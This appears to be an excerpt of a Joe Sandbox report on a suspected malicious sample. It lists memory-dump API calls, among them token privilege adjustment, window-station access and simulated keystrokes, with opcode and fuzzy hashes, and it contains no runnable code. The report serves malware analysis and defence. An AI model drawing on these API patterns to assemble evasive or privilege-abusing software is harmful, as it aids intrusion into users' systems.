                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: ad6915fd89b7503fc063a0e8f439e4519d5b14d072d1c79b3466c1e74706038a
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 3831E070A001059FC71ADF48C486A6AFBB6FB49300B25C6A5E80ACF759DB31EDD1DB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 37774f10c01b2d96019bb3af34ff6be684d20039d7083ddbecf907c4fbb05ac4
                                                        • Instruction ID: 45b2c9f108318b90d74cbfdee242a2864d86dd664c6fc2d4fa596bcf3d14e72c
                                                        • Opcode Fuzzy Hash: 37774f10c01b2d96019bb3af34ff6be684d20039d7083ddbecf907c4fbb05ac4
                                                        • Instruction Fuzzy Hash: 4841F3746087518FDB26DF14C494B1ABBE1BF45318F0988ACE8998B762C736FC45CB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 075b42700a0b142df69ace10a6a7aed0fbefe1ff72926418da417672e55a0832
                                                        • Instruction ID: 35cb93b79d0e1b97dbe6e1c0871cd79fa76b1470fd2db256dcca1e8975d7522f
                                                        • Opcode Fuzzy Hash: 075b42700a0b142df69ace10a6a7aed0fbefe1ff72926418da417672e55a0832
                                                        • Instruction Fuzzy Hash: 54210872614A09EBDB278F15E84177A7BF8FB18350F21C56EE449C91A0EB3091D0D745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0a7fdcf8f26cf7499cf53811273db1d038b19e08a758a41fabadd13cc4981c7
                                                        • Instruction ID: 47d996a051046e28276ae12d9842644ee1e03908dbb10dfa4453b0ca76536535
                                                        • Opcode Fuzzy Hash: f0a7fdcf8f26cf7499cf53811273db1d038b19e08a758a41fabadd13cc4981c7
                                                        • Instruction Fuzzy Hash: FE210535109B50AFC7338F24D842AE7BBE8EF42311B0185BEF8488BD55D7344AA5CBA1
                                                        APIs
                                                          • Part of subcall function 00344BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00344BEF
                                                          • Part of subcall function 0036525B: __wfsopen.LIBCMT ref: 00365266
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E0F
                                                          • Part of subcall function 00344B6A: FreeLibrary.KERNEL32(00000000), ref: 00344BA4
                                                          • Part of subcall function 00344C70: _memmove.LIBCMT ref: 00344CBA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                        • String ID:
                                                        • API String ID: 1396898556-0
                                                        • Opcode ID: 882dde8a0dacb5b476d977cb304547aefbc0aa05fafd553de23307d3e3f07a9c
                                                        • Instruction ID: 5649d42aa68ad503735dc54581d0379c21dc689babb9ea63a0b1e2f61870ff9c
                                                        • Opcode Fuzzy Hash: 882dde8a0dacb5b476d977cb304547aefbc0aa05fafd553de23307d3e3f07a9c
                                                        • Instruction Fuzzy Hash: 4E11A331600205ABCF27AF70D816FAD77E9EF44710F108839F541AF181EA75AE559B51
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: e808ccd9a958540cf11c380576508a1a0f8c08c9294c65a071cf3dabd39b74c8
                                                        • Instruction ID: 5138e0ac444cb0f8980286bd97e470c7a41474ac311e47054443ef5433e6e8ff
                                                        • Opcode Fuzzy Hash: e808ccd9a958540cf11c380576508a1a0f8c08c9294c65a071cf3dabd39b74c8
                                                        • Instruction Fuzzy Hash: 93210474A08701DFCB16DF64C444A1ABBE5BF85314F05896CE8899B761D731F809CB92
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 003648A6
                                                          • Part of subcall function 00368B28: __getptd_noexit.LIBCMT ref: 00368B28
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: cf14e3f48ebb70675c1cc31ac62b035473c01f6b3d6db1a179e456d95e37a397
                                                        • Instruction ID: dd985b371327945350ce760b672fb30f602ac6707d3aca785c2d9663e70c2238
                                                        • Opcode Fuzzy Hash: cf14e3f48ebb70675c1cc31ac62b035473c01f6b3d6db1a179e456d95e37a397
                                                        • Instruction Fuzzy Hash: 35F0AF71D00609ABDF13AFA88C067AE36A1AF00325F15C514F4249F199CBB9C951DF51
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: f655ff83fe0df26ba1b1339a6eb0e63f1e108d1a3bf1138aaf267e173edc5f19
                                                        • Instruction ID: c026a941badee23cc9ac704594b736abf63a7e956631a39d4f9b0719f768549f
                                                        • Opcode Fuzzy Hash: f655ff83fe0df26ba1b1339a6eb0e63f1e108d1a3bf1138aaf267e173edc5f19
                                                        • Instruction Fuzzy Hash: 25F06D71501711CFCB369F64E494912BBF5BF143293258A3EE1D78AA20C772B880DF40
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003607B0
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: 2c6d64d83487c6f8a0654c70a4378690e1e117302aae80a131cd074c06d6779c
                                                        • Instruction ID: 16d10b178b5dae8ea05da1d157e944104e5262aa7e75098c33357669db383a2d
                                                        • Opcode Fuzzy Hash: 2c6d64d83487c6f8a0654c70a4378690e1e117302aae80a131cd074c06d6779c
                                                        • Instruction Fuzzy Hash: D4E0CD379041285BC722D65C9C05FEA77DDDF897A0F0441B5FD0CDB204DA64AC8087D0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                        • Instruction ID: fc83322b9bb4898e0730ab9b07c6f2d628602ddd62720cccce0eeaebcb365663
                                                        • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                        • Instruction Fuzzy Hash: 75E092B0504B009BD7398B24D800BA373E1EB06304F00091DF2AB83241EB6278418759
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 1826a141e7f02041c754d832ff0ba665d823d52e81cb0b01d15ef6abd7d0e8ee
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 18B0927644020C77CE022A82EC02A493B299B41764F408020FB0C1C162A673A6649A89
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 00C71099
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2133386192.0000000000C6E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C6E000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c6e000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 86f5b164887078d4915143cd3911694f270bb53634d7fa7250c20e1a9d30ef4d
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: BFE0E67494010DDFDB10EFB8D9496DD7BB4EF04301F104261FD05D2280D6309E508A62
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003CCB37
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCB95
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003CCBD6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCC00
                                                        • SendMessageW.USER32 ref: 003CCC29
                                                        • _wcsncpy.LIBCMT ref: 003CCC95
                                                        • GetKeyState.USER32(00000011), ref: 003CCCB6
                                                        • GetKeyState.USER32(00000009), ref: 003CCCC3
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCCD9
                                                        • GetKeyState.USER32(00000010), ref: 003CCCE3
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCD0C
                                                        • SendMessageW.USER32 ref: 003CCD33
                                                        • SendMessageW.USER32(?,00001030,?,003CB348), ref: 003CCE37
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003CCE4D
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003CCE60
                                                        • SetCapture.USER32(?), ref: 003CCE69
                                                        • ClientToScreen.USER32(?,?), ref: 003CCECE
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003CCEDB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003CCEF5
                                                        • ReleaseCapture.USER32 ref: 003CCF00
                                                        • GetCursorPos.USER32(?), ref: 003CCF3A
                                                        • ScreenToClient.USER32(?,?), ref: 003CCF47
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CCFA3
                                                        • SendMessageW.USER32 ref: 003CCFD1
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD00E
                                                        • SendMessageW.USER32 ref: 003CD03D
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003CD05E
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003CD06D
                                                        • GetCursorPos.USER32(?), ref: 003CD08D
                                                        • ScreenToClient.USER32(?,?), ref: 003CD09A
                                                        • GetParent.USER32(?), ref: 003CD0BA
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD123
                                                        • SendMessageW.USER32 ref: 003CD154
                                                        • ClientToScreen.USER32(?,?), ref: 003CD1B2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003CD1E2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD20C
                                                        • SendMessageW.USER32 ref: 003CD22F
                                                        • ClientToScreen.USER32(?,?), ref: 003CD281
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003CD2B5
                                                          • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003CD351
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$F$pb@
                                                        • API String ID: 3977979337-1958197849
                                                        • Opcode ID: 290686a024506676675a4fa987535de2edd485cf6f6373e007acbcb14f7e8e0e
                                                        • Instruction ID: 137ed192ac2cfa7c2d0b0f0bf9e72148bc668a33cf0d3a6874a66fa70da5d59e
                                                        • Opcode Fuzzy Hash: 290686a024506676675a4fa987535de2edd485cf6f6373e007acbcb14f7e8e0e
                                                        • Instruction Fuzzy Hash: 39428A35214240AFDB22DF64C848FAABBE9FF49310F15492DF659DB2A0C731AC51DB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: ]?$3c5$DEFINE$P\?$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_5
                                                        • API String ID: 1357608183-2281723495
                                                        • Opcode ID: c000aeea39527d0ee249ba9fa581ae8f2311236d1f9aef0b7b425f0712274bdd
                                                        • Instruction ID: e6f46c7a0f90dd140bcb78b5af1e7dc7719b810e6bcade37240950b3a4636edf
                                                        • Opcode Fuzzy Hash: c000aeea39527d0ee249ba9fa581ae8f2311236d1f9aef0b7b425f0712274bdd
                                                        • Instruction Fuzzy Hash: C793A075E04219DBDF26CF98D881BADB7B1FF48310F25816AE945AB391E7709E81CB40
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 003448DF
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0037D665
                                                        • IsIconic.USER32(?), ref: 0037D66E
                                                        • ShowWindow.USER32(?,00000009), ref: 0037D67B
                                                        • SetForegroundWindow.USER32(?), ref: 0037D685
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037D69B
                                                        • GetCurrentThreadId.KERNEL32 ref: 0037D6A2
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037D6AE
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037D6BF
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037D6C7
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 0037D6CF
                                                        • SetForegroundWindow.USER32(?), ref: 0037D6D2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D6E7
                                                        • keybd_event.USER32(00000012,00000000), ref: 0037D6F2
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D6FC
                                                        • keybd_event.USER32(00000012,00000000), ref: 0037D701
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D70A
                                                        • keybd_event.USER32(00000012,00000000), ref: 0037D70F
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037D719
                                                        • keybd_event.USER32(00000012,00000000), ref: 0037D71E
                                                        • SetForegroundWindow.USER32(?), ref: 0037D721
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 0037D748
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: 7f49a6566f40433d50aab7266e686a7c9c9cc16e0afaaf333c93c7d45b9bcd2f
                                                        • Instruction ID: 092e0ae0e34ea811e8681c2c7415e6d491c24b526ee3bd6598968eb79b335587
                                                        • Opcode Fuzzy Hash: 7f49a6566f40433d50aab7266e686a7c9c9cc16e0afaaf333c93c7d45b9bcd2f
                                                        • Instruction Fuzzy Hash: E2317271A40318BFEB226F619C89F7F7E6DEF44B50F114025FA09EA1D1C6B46910ABA0
                                                        APIs
                                                          • Part of subcall function 003987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                                          • Part of subcall function 003987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                                          • Part of subcall function 003987E1: GetLastError.KERNEL32 ref: 00398865
                                                        • _memset.LIBCMT ref: 00398353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003983A5
                                                        • CloseHandle.KERNEL32(?), ref: 003983B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003983CD
                                                        • GetProcessWindowStation.USER32 ref: 003983E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 003983F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0039840A
                                                          • Part of subcall function 003981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00398309), ref: 003981E0
                                                          • Part of subcall function 003981CB: CloseHandle.KERNEL32(?,?,00398309), ref: 003981F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: 5d93789f0d8e181e55d6b96d059c96292ee168119b4c4c9eecdbc7b7b0a5a95c
                                                        • Instruction ID: 9b1eacead49812b5726ed859b0b634bb0fa4e7f998a0c7fa39c4e35ec69fdf62
                                                        • Opcode Fuzzy Hash: 5d93789f0d8e181e55d6b96d059c96292ee168119b4c4c9eecdbc7b7b0a5a95c
                                                        • Instruction Fuzzy Hash: 2A8177B1900209AFDF129FA5CC45EFEBBB9FF46304F158169F910A6261DB319E18DB20
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003AC78D
                                                        • FindClose.KERNEL32(00000000), ref: 003AC7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003AC844
                                                        • __swprintf.LIBCMT ref: 003AC890
